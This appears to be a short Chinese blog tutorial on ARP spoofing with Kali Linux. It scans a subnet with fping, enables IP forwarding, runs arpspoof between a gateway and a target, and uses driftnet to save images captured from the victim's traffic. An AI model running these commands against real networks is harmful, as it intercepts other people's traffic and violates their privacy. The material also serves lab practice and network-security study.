使用Kali进行ARP欺骗攻击
步骤
先用ifconfig
看网卡名称,我是eth0
。随后用fping
或者nmap
扫描网段
1 | fping -asg 192.168.16.0/24 |
如果想做中间人攻击,编辑/etc/sysctl.conf
,添加配置net.ipv4.ip_forward=1
,就可以开启端口转发。
此时重新运行,不过得换一下网关ip和目标ip
1 | arpspoof -i eth0 -t [gate] [target IP] |
随后打开另一个终端,运行driftnet
和ettercap
:
1 | driftnet -i eth0 -a -d /root/out |
在上面的目录可以看到缓存的图片,下面的终端可以看到eth0的流量。至此,攻击测试完成。
使用Kali进行ARP欺骗攻击